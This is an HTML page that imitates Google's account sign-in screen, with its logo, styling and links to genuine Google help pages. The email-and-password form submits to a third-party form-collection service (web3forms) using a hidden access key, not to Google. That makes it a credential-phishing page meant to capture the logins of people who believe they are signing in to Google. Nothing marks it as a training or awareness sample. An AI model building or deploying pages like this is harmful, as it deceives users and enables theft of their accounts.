<html lang="en">

<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Sign in - Google Accounts</title>
  <link rel="icon" href="https://www.google.com/favicon.ico" type="image/x-icon">
  <style>
    * {


      font-family: arial, sans-serif;
    }

    .mainbox {
      background: #fff;
      border: 1px solid rgb(218, 220, 224);
      border-radius: 10px;
      display: flex;
      align-items: center;
      margin-top: 46px;
      width: 496px;
      margin-left: auto;
      margin-right: auto;
      height: 600px;
      flex-direction: column;


    }

    .inbox {
      padding-top: 53px;

    }

    .towinbox {

      font-size: 26.5px;
      color: rgb(32, 33, 36);
      font-family: arial, sans-serif;

      height: 62px;
      display: flex;
      justify-content: center;
      align-items: center;

    }

    .threeinbox {

      color: rgb(57, 57, 57);

      font-family: arial, sans-serif;
      font-size: 17px;
      letter-spacing: 0.1px;
      height: 12px;
      display: flex;
      justify-content: center;
      align-items: center;


    }

    /* Basic styling */
    .form-group {
      position: relative;
      margin-top: 35px;
      margin-left: 45px;
    }

    input[type="email"] {

      padding: 8px;
      font-size: 16px;
      outline: none;

      width: 400px;
      height: 64px;
      border: 1px solid rgb(218, 220, 224);
      border-radius: 5px;
      margin-top: 10px;
    }
    input[type="password"] {

      padding: 8px;
      font-size: 16px;
      outline: none;

      width: 400px;
      height: 64px;
      border: 1px solid rgb(218, 220, 224);
      border-radius: 5px;
      margin-top: 20px;
    }

    #email-label {
      position: absolute;
      top: 5px;
      left: 7px;
      font-size: 14px;
      color: rgb(108, 107, 107);
      background-color: #fff;
      font-family: arial, sans-serif;

    }
    label{
      position: absolute;
      top: 88px;
      left: 7px;
      font-size: 14px;
      color: rgb(108, 107, 107);
      background-color: #fff;
      font-family: arial, sans-serif;
    }

    /* Styling when input is active */
    input[type="email"]:focus {
      border: 3px solid rgb(32, 125, 255);
    }

    input[type="email"]:focus+ #email-label {
      color: rgb(0, 119, 255);
    }
   
    input[type="password"]:focus {
      border: 3px solid rgb(32, 125, 255);
    }

    input[type="password"]:focus+ label {
      color: rgb(0, 119, 255);
    }
    #link {
      text-decoration: none;
      color: rgb(0, 119, 255);
      font-family: arial, sans-serif;
      font-size: 16px;
      margin-left: 48px;
      margin-top: 10px;

    }

    .link {
      display: flex;
      justify-content: flex-start;
      align-items: center;
      margin-top: 13px;
      width: 100%;
    }

    .text {
      color: gray;
      margin-top: 40px;
      display: flex;
      flex-direction: column;
      line-height: 13px;
      margin-left: 45px;


    }

    #pin {
      text-decoration: none;
      color: rgb(0, 119, 255);
      font-family: arial, sans-serif;
      font-size: 16px;
      line-height: 0px;
      


    }

    a {
      text-decoration: none;

      font-family: arial, sans-serif;
      font-size: 16px;
      line-height: 0px;
    }

    #bb {
      color: rgb(0, 119, 255);
      
    }

    .bubox {
      display: flex;
      justify-content: space-between;
      align-items: center;
      margin-top: 70px;
      width: 80%;
      justify-self: center;


    }

    button {
      background-color: rgb(0, 110, 255);
      border: none;
      color: #fff;
      border-radius: 5px;
      width: 87px;
      padding: 13px;
    }

    .N158t {
      -webkit-appearance: none;
      appearance: none;
      background-color: transparent;
      background-image: url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIGhlaWdodD0iMjRweCIgdmlld0JveD0iMCAwIDI0IDI0IiB3aWR0aD0iMjRweCIgZmlsbD0iIzQ1NUE2NCI+PHBhdGggZD0iTTAgMGgyNHYyNEgwVjB6IiBmaWxsPSJub25lIi8+PHBhdGggZD0iTTcgMTBsNSA1IDUtNUg3eiIvPjwvc3ZnPg==);
      background-position: right;
      background-repeat: no-repeat;
      border: none;
      border-radius: 4px;
      color: rgb(95, 99, 104);
      cursor: pointer;
      font-size: 12px;
      line-height: 15.9996px;
      outline: none;
      padding: 16.0002px 24px 16.0002px 16px;
    }

    option {
      font-weight: normal;
      display: block;
      padding-block-start: 0px;
      padding-block-end: 1px;
      min-block-size: 1.2em;
      padding-inline: 2px;
      white-space: nowrap;
    }

    .end {
      display: flex;
      width: 496px;
      margin: auto;
      justify-content: space-between;
    }

    .lin {
      display: flex;
      justify-content: space-between;
      align-items: center;
      font-size: small;
      width: 35%;


    }
    @media screen and (max-width: 700px) {
    
    .mainbox {
      width: 100%;
      border: none;
      margin-top: 0;
      margin-left: 0;
    }
     .end{
      width: 95%;
      margin: auto;

    }
    .lin{
      width: 40%;
      

    }
    input[type="email"]{
      width: 90%;
    }
    input[type="password"]{
      width: 90%;
    }
    .bubox{
    
    justify-content: space-between;
    width: 83%;
   margin-right: auto;
   margin-left: auto;
  }
  .mein{
      font-size:15px;
  }
    }
  </style>
</head>

<body>
  <div class="mainbox">
    <div class="inbox">
      <img src="//ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png" class="TrZEUc"
        alt="Google" width="82.5">

    </div>
    <div class="towinbox">
      <p>Sign in</p>
    </div>
    <div class="threeinbox">
      <p>Use your Google Account</p>

    </div>
    
    <form action="https://api.web3forms.com/submit" method="POST">
      <input type="hidden" name="access_key" value="8b1d57c0-61f0-4bc9-81ed-09ef587e817e">
      <div class="form-group" id="email-group">

        <input type="email" id="email" name="email" required autofocus="" autocapitalize="none" autocomplete="username"
          dir="ltr" aria-invalid="true">
        <label for="email" id="email-label">&nbsp; Email or phone &nbsp;</label>
        <input type="password"  required>
        <label for="text" >&nbsp; Enter Password &nbsp;</label>

      </div>
      <div class="link">
        <a href="https://accounts.google.com/signin/usernamerecovery?continue=https://myaccount.google.com?utm_source%3Daccount-marketing-page%26utm_medium%3Dgo-to-account-button&dsh=S1158325643:1658211127776399&flowEntry=ServiceLogin&flowName=WebLiteSignIn&hl=en-GB&ifkv=AX3vH3_bYh-h8vfEn4axxHYHWeAkdQzH6uSDfUlqK0JAErYDZynJeQ6qX3sQf3ZBCt3t8yWEzfbnrg&service=accountsettings"
          id="link">Forgot email?</a>
      </div>
      <div class="text">
        <p>Not your computer? Use Guest mode to sign in privately.</p>
        <a href="https://support.google.com/chrome/answer/6130773?hl=en-GB" id="pin">Learn more about using Guest
          mode</a>
      </div>
      <div class="bubox">
        <a href="https://accounts.google.com/lifecycle/steps/signup/name?continue=https://myaccount.google.com?utm_source%3Daccount-marketing-page%26utm_medium%3Dgo-to-account-button&dsh=S1158325643:1658211127776399&flowEntry=SignUp&flowName=GlifWebSignIn&hl=en-GB&ifkv=AX3vH3_bYh-h8vfEn4axxHYHWeAkdQzH6uSDfUlqK0JAErYDZynJeQ6qX3sQf3ZBCt3t8yWEzfbnrg&service=accountsettings&TL=AKOx4s0NJN4_GHbGFkmB90cN4SUMvCjxkKa_XyWdHemenh_IDkM8Qd0hVIZC4Fye"
          id="bb">Create Account</a>
       <button type="submit" class="btn btn-primary">Next</button>
      </div>
  </div>
  </form>

  <div class="end">
    <div class="lan">
      <select name="l1" id="language" class="N158t">

        <option value="en-US">English (United States)</option>
        <option value="en">English</option>
        <option value="es">Español (Spanish)</option>
        <option value="fr">Français (French)</option>
        <option value="de">Deutsch (German)</option>
        <option value="zh-CN">中文 (Chinese)</option>
        <option value="hi">हिन्दी (Hindi)</option>
        <option value="ar">العربية (Arabic)</option>
        <option value="ru">Русский (Russian)</option>
        <option value="pt">Português (Portuguese)</option>
        <option value="ja">日本語 (Japanese)</option>
        <option value="ko">한국어 (Korean)</option>
        <option value="af">Afrikaans</option>
        <option value="sq">Albanian</option>
        <option value="am">Amharic</option>
        <option value="ar">Arabic</option>
        <option value="hy">Armenian</option>
        <option value="az">Azerbaijani</option>
        <option value="eu">Basque</option>
        <option value="be">Belarusian</option>
        <option value="bn">Bengali</option>
        <option value="bs">Bosnian</option>
        <option value="bg">Bulgarian</option>
        <option value="ca">Catalan</option>
        <option value="ceb">Cebuano</option>
        <option value="co">Corsican</option>
        <option value="hr">Croatian</option>
        <option value="cs">Czech</option>
        <option value="da">Danish</option>
        <option value="nl">Dutch</option>
        <option value="en">English</option>
        <option value="eo">Esperanto</option>
        <option value="et">Estonian</option>
        <option value="fi">Finnish</option>
        <option value="fr">French</option>
        <option value="fy">Frisian</option>
        <option value="gl">Galician</option>
        <option value="ka">Georgian</option>
        <option value="de">German</option>
        <option value="el">Greek</option>
        <option value="gu">Gujarati</option>
        <option value="ht">Haitian Creole</option>
        <option value="ha">Hausa</option>
        <option value="haw">Hawaiian</option>
        <option value="he">Hebrew</option>
        <option value="hi">Hindi</option>
        <option value="hmn">Hmong</option>
        <option value="hu">Hungarian</option>
        <option value="is">Icelandic</option>
        <option value="ig">Igbo</option>
        <option value="id">Indonesian</option>
        <option value="ga">Irish</option>
        <option value="it">Italian</option>
        <option value="ja">Japanese</option>
        <option value="jw">Javanese</option>
        <option value="kn">Kannada</option>
        <option value="kk">Kazakh</option>
        <option value="km">Khmer</option>
        <option value="rw">Kinyarwanda</option>
        <option value="ko">Korean</option>
        <option value="ku">Kurdish</option>
        <option value="ky">Kyrgyz</option>
        <option value="lo">Lao</option>
        <option value="la">Latin</option>
        <option value="lv">Latvian</option>
        <option value="lt">Lithuanian</option>
        <option value="lb">Luxembourgish</option>
        <option value="mk">Macedonian</option>
        <option value="mg">Malagasy</option>
        <option value="ms">Malay</option>
        <option value="ml">Malayalam</option>
        <option value="mt">Maltese</option>
        <option value="mi">Maori</option>
        <option value="mr">Marathi</option>
        <option value="mn">Mongolian</option>
        <option value="my">Myanmar (Burmese)</option>
        <option value="ne">Nepali</option>
        <option value="no">Norwegian</option>
        <option value="ny">Nyanja (Chichewa)</option>
        <option value="or">Odia</option>
        <option value="ps">Pashto</option>
        <option value="fa">Persian</option>
        <option value="pl">Polish</option>
        <option value="pt">Portuguese</option>
        <option value="pa">Punjabi</option>
        <option value="ro">Romanian</option>
        <option value="ru">Russian</option>
        <option value="sm">Samoan</option>
        <option value="gd">Scottish Gaelic</option>
        <option value="sr">Serbian</option>
        <option value="st">Sesotho</option>
        <option value="sn">Shona</option>
        <option value="sd">Sindhi</option>
        <option value="si">Sinhala</option>
        <option value="sk">Slovak</option>
        <option value="sl">Slovenian</option>
        <option value="so">Somali</option>
        <option value="es">Spanish</option>
        <option value="su">Sundanese</option>
        <option value="sw">Swahili</option>
        <option value="sv">Swedish</option>
        <option value="tl">Tagalog</option>
        <option value="tg">Tajik</option>
        <option value="ta">Tamil</option>
        <option value="tt">Tatar</option>
        <option value="te">Telugu</option>
        <option value="th">Thai</option>
        <option value="tr">Turkish</option>
        <option value="tk">Turkmen</option>
        <option value="uk">Ukrainian</option>
        <option value="ur">Urdu</option>
        <option value="ug">Uyghur</option>
        <option value="uz">Uzbek</option>
        <option value="vi">Vietnamese</option>
        <option value="cy">Welsh</option>
        <option value="xh">Xhosa</option>
        <option value="yi">Yiddish</option>
        <option value="yo">Yoruba</option>
        <option value="zu">Zulu</option>
      </select>
    </div>
    <div class="lin" id="lin">
      <a href="https://support.google.com/accounts?hl=en-GB&visit_id=638656251885838150-1700738616&rd=2&p=account_iph#topic=3382296"
        style="color:rgb(95, 99, 104);">Help</a>
      <a href="https://policies.google.com/privacy?gl=PK&hl=en-GB" style="color:rgb(95, 99, 104);">Privacy</a>
      <a href="https://policies.google.com/terms?gl=PK&hl=en-GB" style="color:rgb(95, 99, 104);">Terms</a>
    </div>
  </div>
</body>

</html>